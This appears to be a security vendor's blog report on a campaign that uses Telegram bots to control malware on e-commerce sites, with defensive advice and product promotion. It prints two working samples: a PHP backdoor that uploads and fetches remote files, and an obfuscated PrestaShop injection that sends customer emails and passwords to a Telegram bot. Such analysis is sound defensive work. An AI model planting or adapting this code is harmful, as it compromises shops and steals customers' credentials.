Site icon Astra Security Blog

Hackers are leveraging Telegram to control their malware used to infect e-commerce websites – Astra Security Report

Recently, our security engineers have spotted an ongoing telegram malware campaign in the wild where the hackers are leveraging the widely-used encrypted messaging service ‘Telegram’ to receive error logs from their malware campaign as well as the sensitive information from the hacked sites. 

The error logs or sensitive information that are being sent to the hacker via Telegram is to check whether their malware is planted successfully on a website or not, and in another case, if the malware is planted successfully then they’re sending the sensitive information of the victims to a specific telegram number or channel. Magento, Prestashop and WooCommerce stores remain the top target of this hacking campaign.

A large number of sites are being targeted

As a security provider, we continuously monitor the latest cyber threats and malware campaigns that disrupt businesses on a daily basis. In this telegram malware campaign, we’ve seen a large number of Magneto, Prestashop, WooCommerce and other CMS are targeted.

Usually, when hackers hack into the websites and capture credit card information or any other sensitive data – they make API calls to their servers or send information to their emails.

But in this case, instead of making API calls or sending the stolen data to a specific email address, the threat actors are sending it through the Telegram’s API to a certain telegram number / ID/channel. This is to evade the tracing of the server IP or being blacklisted and obtain the error logs or hacked data via the secured Telegram’s medium.

Hackers gathering error logs of malware from Magento sites 

During the analysis of this telegram malware campaign, our research team led by Ananda Krishna discovered that the hackers are actively planting shell scripts into Magento-based sites in order to upload the unrestricted files or steal sensitive information. If any error occurs during the malware plantation process, then that error is being sent to the hacker’s telegram number/channel for debugging.

Related blog – Fixing a hacked Magento store

After further investigation, our researchers found that the hackers had created malicious backdoors in the website which allowed them to create & execute files code. The hacker could send any arbitrary URL to the backdoor script, which would then download the file from the URL and save it on the compromised server. At every step of this process, or in the case of errors – this backdoor script would send real-time updates to the hacker via a Telegram message. 

The hacker sent the name of the malicious file in the $_POST[‘name’] variable and the URL of the malicious file in the $_POST[‘content’] variable.

Here is an example of the malicious script (as flagged by our malware scanner) we found in a compromised site we scanned:

Image: Malicious code flagged by Astra’s malware scanner

The hacker sends a request with $_POST[‘name’] =  evil.php  and $_POST[‘content’] = example.com/moreMaliciousCode.txt . The backdoor script then creates a file called evil.php on the server with the file contents found in example.com/moreMaliciousCode.txt. The hacker then visits compromised-site.com/evil.php to execute the bad code.


On some sites, we’ve seen that hackers have used this backdoor script to create “File Manager” scripts or database administration tools such as “Adminer”. Such tools allow them to view/edit/delete all the files on your server and also get full access to the website’s database which would contain sensitive personally identifiable information (PII) such as passwords, email addresses, credit card numbers, etc.

Snippet of the malicious code:

<?php
           try{
                if($_POST['action']=="wp_ajax_try_2020_v2"){
                    if(!empty ($_FILES['file']) and md5(md5(md5($_POST['token_admin'])))=="7ccda4acaa2341a049350d96fe88393b"){
                      if(function_exists("move_uploaded_file")){
                        @move_uploaded_file($_FILES['file']['tmp_name'],"../".$_FILES['file']['name']);
                        echo " file name : ".$_FILES['file']['name'];
                     }else{
                        die("no move_upload_file");
                     }                         
                    }else{
                        die(0);
                    }                    
                    exit();
                }
                if($_POST['action']=="wp_ajax_try_2020_v3"){
                    if(!empty ($_POST['content']) and md5(md5(md5($_POST['token_admin'])))=="7ccda4acaa2341a049350d96fe88393b"){
                        if(function_exists("file_get_contents")){
                         $html=file_get_contents($_POST['content']);
                          $save=fopen($_POST['name'],"w");
                          fwrite($save,$html);
                          fclose($save);
                        }else{
                          die("no file_get_contents");
                        }                            
                    }else{
                        die(0);
                    }                    
                    exit();
                }            
            }catch (Exception $e) {
                if(function_exists("file_get_contents")){
                    try{
                        file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($_SERVER['REMOTE_ADDR']."  error wp")."" );
                        file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($e)."" );
                    }catch (Exception $e2) {}
                }                
            }
        ?>

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Website Protection before it is too late.

Hackers stealing information from Prestashop sites 

Similar to the Magento sites, the hackers are also targeting Prestashop sites and leveraging Telegram API for sending the stolen sensitive information of the site owners to their Telegram number/channel. 

In this case, our researchers saw the hackers bypassing the function implemented for getting the customer details by email in classes/Customer.php and placing their malicious code to send the site owner’s email address and password to the Telegram number/channel.

The hacking group is believed to be named as B4JAT4X (as mentioned in the below code sample):

 if(isset($passwd)){
        $passwordbaja=$passwd;
        }elseif(isset($plaintextPassword)){
        $passwordbaja=$plaintextPassword;
        }
        $djskfhsdfdjknjksnfjksfds = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";
        $djskfhsdfdjknjksnfjksfds .= $email.":".$passwordbaja.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";
        file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" .
        urlencode($djskfhsdfdjknjksnfjksfds)."" );

This can lead to Prestashop site owners in getting their sensitive customer information stolen if they store credit card information of their users on their Prestashop sites. A hacker can simply log in to the victim’s site using his/her password and see all the information. 

Web security challenges

As the cyber threat landscape extends one more step towards the Internet disruption, hackers are actively finding new techniques like these to bring down online business on their knees. If your company is impacted due to a cyber attack like this then it can also land a PII breach and GDPR breach.

Earlier this month, Malwarebytes has also discovered a web skimmer that steals credit data from websites and sends it to the hacker via Telegram messenger.

To protect your websites against this telegram malware campaign, it is advised to block all the connections to Telegram at the network level or use a web application firewall which will ensure your site is well protected against such attacks and doesn’t allow any hackers to steal your sensitive data.

If you are using Astra’s application firewall then you are already protected from this attack and other cyber attacks and vulnerabilities like SQLi, XSS, CSRF, LFI, RFI, credit card hacks, spam, bad bots, etc.

Further, Astra’s machine-learning powered malware scanner can automatically scan a website regularly and flag all foreign elements and happenings in a website. This includes the addition of new malicious files or modification of the existing ones. With the ‘View file difference’ feature of Astra’s malware scanner, you can review all changes from within the dashboard and even delete malicious files with just a click of a button.

Security experts have long been recommending regular malware scanning as a key security measure for the safety of websites, it is time you primed your websites with due security measures to keep it protected at all times.

Exit mobile version